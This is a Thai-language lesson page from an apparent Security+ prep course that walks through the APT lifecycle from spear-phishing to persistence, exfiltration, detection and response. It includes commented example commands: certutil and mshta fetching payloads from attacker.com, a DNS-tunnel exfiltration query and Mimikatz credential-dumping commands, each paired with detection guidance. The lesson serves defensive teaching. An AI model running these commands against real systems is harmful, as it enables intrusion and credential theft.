0Pricing
Cloud & IT Cert Prep · บทเรียน

วงจรชีวิต APT: จากการเข้าถึงครั้งแรกสู่การคงอยู่ในระบบ

ติดตาม APT ตั้งแต่การเข้าถึงครั้งแรกผ่านสเปียร์ฟิชชิง ไปจนถึงการจัดตั้ง C2 การยกระดับสิทธิ์ และกลไกการคงอยู่ที่ยังทำงานต่อได้หลังรีบูตและติดตั้งอิมเมจใหม่

วงจรชีวิต APT: จากการเข้าถึงครั้งแรกสู่การคงอยู่ในระบบ เป็นบทเรียน Cloud & IT Cert Prep ฟรีบน CoddyKit นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cloud & IT Cert Prep และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cloud & IT Cert Prep มีบทเรียนทั้งหมด 4 บทเรียน

ภัยคุกคามแบบต่อเนื่องขั้นสูงคืออะไร

ภัยคุกคามแบบต่อเนื่องขั้นสูง (APT) คือแคมเปญการโจมตีทางไซเบอร์ระยะยาวที่มีความซับซ้อน โดยทั่วไปดำเนินการโดยผู้โจมตีระดับรัฐชาติหรือกลุ่มอาชญากรรมที่มีเงินทุนสูงและมีเป้าหมายเชิงกลยุทธ์ที่ชัดเจน คุณลักษณะสำคัญสามประการคือ ขั้นสูง — ใช้มัลแวร์ที่สร้างขึ้นเฉพาะ การโจมตีแบบ zero-day และเทคนิคใหม่ ๆ; ต่อเนื่อง — รักษาการแฝงตัวเป็นเวลาหลายเดือนหรือหลายปี ไม่ใช่การโจมตีแบบฉวยโอกาสแล้วจบลงอย่างรวดเร็ว; ภัยคุกคาม — เป็นการโจมตีที่ประสานงานและมุ่งเป้าไปยังองค์กรใดองค์กรหนึ่งโดยเฉพาะ กลุ่ม APT ที่มีชื่อเสียง ได้แก่ APT28 (Fancy Bear) ซึ่งเชื่อมโยงกับ GRU ของรัสเซีย APT41 ซึ่งเชื่อมโยงกับจีน และ Lazarus Group ซึ่งเชื่อมโยงกับเกาหลีเหนือ

การเข้าถึงเบื้องต้น: APTs เข้าสู่ระบบได้อย่างไร

โดยทั่วไปแคมเปญ APT จะเริ่มต้นด้วยเทคนิคการเข้าถึงเบื้องต้นที่ผ่านการพิสูจน์แล้วจำนวนไม่มาก วิธีที่พบบ่อยที่สุดคือ ฟิชชิงแบบเจาะจงเป้าหมาย พร้อมไฟล์แนบที่แฝงอันตรายหรือลิงก์ขโมยข้อมูลประจำตัว โดยอีเมลจะดูเหมือนส่งมาจากเพื่อนร่วมงานหรือพันธมิตรที่น่าเชื่อถือ การโจมตีห่วงโซ่อุปทาน (เช่น SolarWinds/SUNBURST) จะแทรกโค้ดอันตรายลงในการอัปเดตซอฟต์แวร์ที่เชื่อถือได้ การใช้ประโยชน์จากบริการที่เปิดรับจากอินเทอร์เน็ต (อุปกรณ์ VPN เซิร์ฟเวอร์ Exchange เว็บแอปพลิเคชัน) โดยใช้ CVE ที่ยังไม่ได้รับการแก้ไข และ การโจมตีแบบหลุมรดน้ำ จะเจาะเว็บไซต์ที่พนักงานขององค์กรเป้าหมายเข้าชม แล้วส่งการโจมตีแบบไดรฟ์บายไปยังผู้เยี่ยมชม

การดำเนินการ: เรียกใช้เพย์โหลดแรก

หลังจากได้การเข้าถึงเบื้องต้นแล้ว ผู้โจมตีต้องเรียกใช้เพย์โหลดแรกบนระบบเป้าหมาย APTs มักเลือกเทคนิคที่กลมกลืนกับกิจกรรมปกติของระบบ ได้แก่ มาโครอันตราย ในเอกสาร Office ซึ่งทำงานเมื่อเหยื่อเปิดใช้งานเนื้อหา; ไฟล์ HTML Application (HTA) ซึ่งเรียกใช้สคริปต์เมื่อเปิด; และ ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins) — ใช้เครื่องมือ Windows ที่ถูกต้องตามปกติ เช่น mshta.exe, certutil.exe, regsvr32.exe หรือ wscript.exe เพื่อเรียกใช้โค้ดของผู้โจมตีและหลบเลี่ยงรายการอนุญาตแอปพลิเคชัน เทคนิคเหล่านี้ทำให้แยกเพย์โหลดแรกออกจากกิจกรรมระบบที่ถูกต้องตามปกติได้ยาก

# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe

# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta

# Detection: alert on certutil/mshta with network connections

การจัดตั้ง C2: ติดต่อกลับไปยังผู้โจมตี

เมื่อเพย์โหลดแรกทำงานแล้ว เพย์โหลดนั้นจะสร้างช่องทาง Command and Control (C2) กลับไปยังโครงสร้างพื้นฐานของผู้โจมตี C2 สมัยใหม่ของ APTs ใช้เทคนิคที่ออกแบบมาเพื่อหลบเลี่ยงการตรวจจับ ได้แก่ HTTPS ไปยังโดเมนเลียนแบบ ที่ทำให้ดูคล้ายบริการคลาวด์ที่ถูกต้อง เช่น Teams, OneDrive และ GitHub; การทำอุโมงค์ DNS — เข้ารหัสคำสั่งไว้ในคำขอระเบียน TXT ของ DNS ซึ่งดูเหมือนการรับส่งข้อมูล DNS ปกติ; อัลกอริทึมสร้างโดเมน (DGAs) ที่สร้างโดเมน C2 ใหม่ในแต่ละวันจากค่าเริ่มต้น ทำให้การบล็อกโดเมนไม่ได้ผล; และ C2 แบบ ใช้ประโยชน์จากเครื่องมือในระบบ โดยใช้แพลตฟอร์มคลาวด์ที่ถูกต้อง เช่น Slack API, Google Sheets และ Twitter เป็นช่องทางสื่อสาร

# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)

# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)

การค้นหา: ทำแผนผังสภาพแวดล้อม

หลังจากจัดตั้ง C2 แล้ว ผู้ดำเนินการ APT จะทำ การลาดตระเวนภายใน เพื่อทำความเข้าใจสภาพแวดล้อมก่อนเคลื่อนที่ต่อ ซึ่งรวมถึง การแจกแจง Active Directory โดยใช้เครื่องมืออย่าง BloodHound เพื่อทำแผนผังความสัมพันธ์ด้านความไว้วางใจและระบุเป้าหมายมูลค่าสูง; การสแกนเครือข่าย เพื่อค้นหาโฮสต์ที่ทำงานอยู่ บริการ และพอร์ตที่เปิด; การค้นหาข้อมูลประจำตัว โดยค้นหาระบบไฟล์เพื่อหาไฟล์การตั้งค่า ฐานข้อมูลรหัสผ่าน หรือข้อมูลประจำตัวที่จัดเก็บในเบราว์เซอร์; และ การแจกแจงข้อมูลระบุตัวตน เพื่อระบุบัญชีที่มีสิทธิ์สูง บัญชีบริการ และเวิร์กสเตชันของผู้ดูแลระบบ กิจกรรมการค้นหาส่วนใหญ่ใช้เครื่องมือ Windows แบบ Native (net user /domain, ipconfig, nltest) เพื่อหลีกเลี่ยงการตรวจจับ

# Native Windows commands used by APTs for discovery
# net user /domain                    # list domain users
# net group 'Domain Admins' /domain   # list domain admins
# ipconfig /all                       # network configuration
# netstat -ano                        # active network connections
# tasklist /v                         # running processes

การยกระดับสิทธิ์: ได้สิทธิ์ผู้ดูแลระบบ

โดยทั่วไป APTs จะได้การเข้าถึงเบื้องต้นด้วยข้อมูลประจำตัวของผู้ใช้ที่มีสิทธิ์จำกัด และต้อง ยกระดับสิทธิ์ เพื่อบรรลุเป้าหมาย เส้นทางการยกระดับที่พบบ่อย ได้แก่ การขโมยข้อมูลประจำตัว จากหน่วยความจำโดยใช้ Mimikatz (ดึงแฮช NTLM จากหน่วยความจำของกระบวนการ LSASS); Kerberoasting (ขอตั๋วบริการสำหรับบัญชีบริการแล้วถอดรหัสแบบออฟไลน์); การใช้ประโยชน์จากบริการที่ตั้งค่าผิดพลาด ซึ่งมีสิทธิ์ไม่รัดกุม (เส้นทางไบนารีของบริการที่ไม่ปลอดภัย การจี้ DLL); และ การปลอมตัวเป็นโทเค็น เพื่อขโมยโทเค็นการตรวจสอบสิทธิ์ของกระบวนการที่มีสิทธิ์สูง เทคนิคหลบเลี่ยง User Account Control (UAC) ช่วยให้เปลี่ยนจากผู้ดูแลระบบมาตรฐานเป็น SYSTEM ได้โดยไม่ทำให้ข้อความแจ้ง UAC ปรากฏ

# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords

# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS process

กลไกการคงอยู่: อยู่รอดหลังการรีบูต

APTs ลงทุนอย่างมากกับ กลไกการคงอยู่ ที่อยู่รอดหลังการรีบูตและการสร้างอิมเมจระบบใหม่ เพราะการได้การเข้าถึงเบื้องต้นอาจทำได้ยากและมีต้นทุนสูง เทคนิคการคงอยู่บน Windows ที่พบบ่อย ได้แก่ คีย์ Registry Run (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); งานตามกำหนดเวลา ที่เรียกใช้มัลแวร์ตามตารางเป็นประจำ; บริการ Windows ที่เริ่มทำงานโดยอัตโนมัติ; การสมัครรับเหตุการณ์ WMI (ตรวจจับได้ยากและอยู่รอดจากความพยายามล้างข้อมูลส่วนใหญ่); การจี้ลำดับการค้นหา DLL; และ อิมแพลนต์ขณะบูต/ก่อนระบบปฏิบัติการ (อิมแพลนต์เฟิร์มแวร์ UEFI ที่อยู่รอดแม้ติดตั้งระบบปฏิบัติการใหม่ ซึ่งใช้โดยกลุ่ม Equation/ผู้ดำเนินการที่เชื่อมโยงกับ NSA)

# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services

# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'

การหลบเลี่ยงการป้องกัน: ซ่อนตัวอย่างแนบเนียน

APT ใช้เทคนิค การหลบเลี่ยงการป้องกัน อย่างกว้างขวางเพื่อหลีกเลี่ยงการตรวจจับจากเครื่องมือรักษาความปลอดภัยปลายทางและนักวิเคราะห์ เทคนิคต่าง ๆ ได้แก่ การแทรกกระบวนการ — แทรกโค้ดอันตรายเข้าไปในกระบวนการที่ถูกต้อง เช่น explorer.exe หรือ svchost.exe เพื่อให้มัลแวร์ทำงานภายใต้ชื่อกระบวนการที่น่าเชื่อถือ การเปลี่ยนแปลงเวลาไฟล์ — แก้ไขการประทับเวลาของไฟล์เพื่อทำให้ไฟล์อันตรายดูเหมือนมีอยู่มาหลายปีแล้ว การลบและแก้ไขบันทึก — ล้างบันทึกเหตุการณ์ของ Windows เพื่อลบร่องรอยหลักฐาน การใช้ใบรับรองลงนามโค้ดในทางที่ผิด — ลงนามมัลแวร์ด้วยใบรับรองที่ถูกต้องซึ่งขโมยมา และ การทำงานในหน่วยความจำ (มัลแวร์ไร้ไฟล์) ซึ่งไม่เคยเขียนลงดิสก์ จึงไม่ถูกตรวจจับโดย AV ที่ตรวจจับจากไฟล์

การนำข้อมูลออก: ขโมยข้อมูลอย่างลับ ๆ

APT จัดการ การนำข้อมูลออก อย่างรอบคอบเพื่อหลีกเลี่ยงการกระตุ้นมาตรการควบคุมของ DLP และการตรวจจับความผิดปกติของแบนด์วิดท์ เทคนิคต่าง ๆ ได้แก่ การรวบรวมข้อมูลไว้ล่วงหน้า — รวบรวมข้อมูลเป้าหมายลงในไฟล์เก็บถาวรที่เข้ารหัสก่อนนำออกเป็นชิ้นเล็ก ๆ ตลอดหลายวัน การนำข้อมูลออกผ่าน HTTPS ไปยังบริการจัดเก็บข้อมูลบนคลาวด์ (OneDrive, ดรอปบ็อกซ์) ที่กฎไฟร์วอลล์ขององค์กรอนุญาต การอำพรางข้อมูล — ซ่อนข้อมูลไว้ภายในไฟล์รูปภาพ และ การนำข้อมูลออกตามช่วงเวลา ในเวลาทำการเพื่อให้กลมกลืนกับการรับส่งข้อมูลที่ถูกต้องตามปกติ APT จะนำออกเฉพาะสิ่งที่จำเป็นต้องใช้ (ทรัพย์สินทางปัญญามูลค่าสูง ข้อมูลรับรองความถูกต้อง แผนกลยุทธ์) แทนการคัดลอกทุกอย่างเป็นจำนวนมาก — เพื่อลดร่องรอยและโอกาสถูกตรวจจับ

การตรวจจับกิจกรรมของ APT: ตัวบ่งชี้สำคัญ

การตรวจจับ APT จำเป็นต้องมองให้ไกลกว่าการแจ้งเตือนแต่ละรายการ เพื่อระบุรูปแบบของกิจกรรมที่เกี่ยวข้องกันตลอดห่วงโซ่การโจมตี ตัวบ่งชี้สำคัญ ได้แก่ ความสัมพันธ์ระหว่างกระบวนการแม่กับกระบวนการลูกที่ผิดปกติ (เช่น Word เรียกใช้ PowerShell) คำสั่ง PowerShell ที่เข้ารหัส หรือการดาวน์โหลดจากอินเทอร์เน็ต งานตามกำหนดเวลาหรือบริการที่ถูกสร้างขึ้นในเวลาผิดปกติ การเข้าถึงหน่วยความจำของ LSASS โดยกระบวนการที่ไม่ใช่ระบบ การเคลื่อนที่ด้านข้าง ผ่าน SMB หรือ WMI จากเครื่องลูกข่าย และ การสืบค้น DNS ขาออกที่ผิดปกติ ซึ่งมีชื่อโดเมนย่อยยาวมาก ตัวนำทาง MITRE แอตแท็ก ช่วยให้ผู้ป้องกันสามารถจับคู่เทคนิคที่ตรวจพบกับเมทริกซ์แอตแท็ก และค้นหาช่องว่างในการครอบคลุมการตรวจจับได้

# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLine

การตอบสนองต่อ APT: ควบคุมโดยไม่ให้อีกฝ่ายรู้ตัว

การตอบสนองต่อ APT ที่กำลังดำเนินอยู่ต้องสร้างสมดุลอย่างรอบคอบ: ควบคุมภัยคุกคามโดยไม่แจ้งให้ผู้โจมตีรู้ตัว การควบคุมที่เร็วเกินไป (บล็อกการรับส่งข้อมูล C2 ปิดใช้งานบัญชี) อาจทำให้ APT เปิดใช้งานเพย์โหลดทำลายล้างหรือเร่งการนำข้อมูลออก แนวทางปฏิบัติที่ดี ได้แก่ เฝ้าติดตามอย่างลับ ๆ ขณะรวบรวมข้อมูลข่าวกรอง แบ่งเครือข่ายของโฮสต์ที่ติดเชื้อ อย่างค่อยเป็นค่อยไปโดยใช้กฎไฟร์วอลล์โดยไม่บล็อก C2 ติดตั้งเทคโนโลยีลวง (โทเคนล่อ บัญชีนกขมิ้น) เพื่อเฝ้าติดตามกิจกรรมของผู้โจมตี และ ประสานงานกับหน่วยงานบังคับใช้กฎหมาย ก่อนดำเนินการควบคุมครั้งสำคัญ การแก้ไขอย่างสมบูรณ์จำเป็นต้องระบุกลไกการคงอยู่และบัญชีที่ถูกโจมตีทั้งหมด — หากพลาดอิมแพลนต์แม้เพียงรายการเดียว ผู้โจมตีก็จะกลับมา

ตรวจสอบอย่างรวดเร็ว

ทดสอบความเข้าใจแนวคิด CompTIA Security+ (SY0-701) จากบทเรียนนี้

สรุปบทเรียน

ในบทเรียนนี้ คุณได้เรียนรู้ว่า APT คือแคมเปญที่ก้าวหน้า คงอยู่ยาวนาน และมุ่งเป้าหมาย ซึ่งโดยทั่วไปดำเนินการเป็นเวลาหลายเดือน โดยใช้ฟิชชิงแบบเจาะจง การโจมตีห่วงโซ่อุปทาน หรือการใช้ประโยชน์จากช่องโหว่เพื่อเข้าถึงครั้งแรก APT ใช้ LOLBins และบริการคลาวด์ที่ถูกต้องตามปกติสำหรับ C2 เพื่อกลมกลืนกับการรับส่งข้อมูลทั่วไปและหลบเลี่ยงการตรวจจับ และ กลไกการคงอยู่มีตั้งแต่คีย์ Run ของ Registry ไปจนถึงอิมแพลนต์ในเฟิร์มแวร์ UEFI — โดยเฉพาะการสมัครรับข้อมูล WMI ที่ตรวจจับและแก้ไขได้ยากเป็นพิเศษ ต่อไปเราจะสำรวจเทคนิคการเคลื่อนที่ด้านข้าง ซึ่งรวมถึง Pass-the-Hash และ Pass-the-Ticket

คำถามที่พบบ่อย

บทเรียน “วงจรชีวิต APT: จากการเข้าถึงครั้งแรกสู่การคงอยู่ในระบบ” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “วงจรชีวิต APT: จากการเข้าถึงครั้งแรกสู่การคงอยู่ในระบบ” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cloud & IT Cert Prep ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cloud & IT Cert Prep มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “วงจรชีวิต APT: จากการเข้าถึงครั้งแรกสู่การคงอยู่ในระบบ”

ติดตาม APT ตั้งแต่การเข้าถึงครั้งแรกผ่านสเปียร์ฟิชชิง ไปจนถึงการจัดตั้ง C2 การยกระดับสิทธิ์ และกลไกการคงอยู่ที่ยังทำงานต่อได้หลังรีบูตและติดตั้งอิมเมจใหม่ คุณปฏิบัติ Cloud & IT Cert Prep ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cloud & IT Cert Prep หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cloud & IT Cert Prep บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน

บทเรียน “วงจรชีวิต APT: จากการเข้าถึงครั้งแรกสู่การคงอยู่ในระบบ” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cloud & IT Cert Prep นี้ได้ไหม

ได้ บทเรียน Cloud & IT Cert Prep ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. วงจรชีวิต APT: จากการเข้าถึงครั้งแรกสู่การคงอยู่ในระบบ
  2. การเคลื่อนที่ด้านข้าง: Pass-the-Hash และ Pass-the-Ticket
  3. การโจมตี Kerberoasting และ Golden Ticket
  4. กรอบการทำงาน MITRE ATT&CK สำหรับการตรวจจับและตอบสนอง
← กลับไปที่ Cloud & IT Cert Prep